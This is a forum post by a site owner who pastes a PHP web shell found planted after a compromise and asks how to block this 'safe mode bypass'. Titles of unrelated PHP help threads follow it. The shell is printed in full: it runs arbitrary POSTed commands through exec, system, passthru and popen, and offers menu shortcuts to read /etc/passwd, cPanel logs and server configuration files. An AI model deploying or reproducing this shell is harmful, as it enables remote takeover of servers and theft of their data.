I got hacked and the following code was placed within my files:
Code: [Select]<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would i patch this?, like is their any code i can add to a global file to prevent this "safemode bypass"?
Firewall / visited websites logger
Hi.
Sendmail.php - heading error following check_input
Hi,I would greatly appreciate some help? I am brand new to PHP and have been searching and editing code ALL day :shrug:yet I still cannot find the reason for this error in my Sendmail.php
help with email script...
hey I need help with my mail scriptwhen the form on http://www.mcgdesignstudio.com/contact.html is filled out, it send the from with no errors.. however i never receive it.. my hosting company have
Javascript using window.location seems to lose state
Not sure what forum so let me know if I'm in the wrong place.
How to show more than 1 users with this code...
Hello,i have a table that shows users only if I, as Administrator, want to be shown. But its showing just 1 user and i want to show at least 4. If i copy the code, or use loop, its showing the same
user data not transferring to new page
I'm a PHP learner. After an index.php page, the user goes to a login.php page. Both pages seem to be working.After logging in with username, password, and a special code, the user is transferred to
timezone change with date()
so i put all my times for posts in my made from scratch forum(not phpbb3 or sm)in my mysql db using the time()and when i show the time on webpages i use the date('ymd/h:i:s', $time) kind of thing.now
Filtering an Array Based on Value
I have a very simple script set up that pulls data from a database and is output using this code:Code: Print "<table border cellpadding=3>";Print
removing space from the end of a variable
i have a variable $image which contains the following url "http://tiles.xbox.com/tiles/oo/P5/0mdsb2JgbA9ECgR8GgMfWSpVL2ljb24vMC84MDAwIAABAAAAAP3Wg70=.jpg"but for some reason it is breaking
Session problem?!?
Hello All! I am very new to the php world but I am working on fixing things that a previous programmer screwed up for a site that I have. Let me explain what the current issue is. I believe it had to
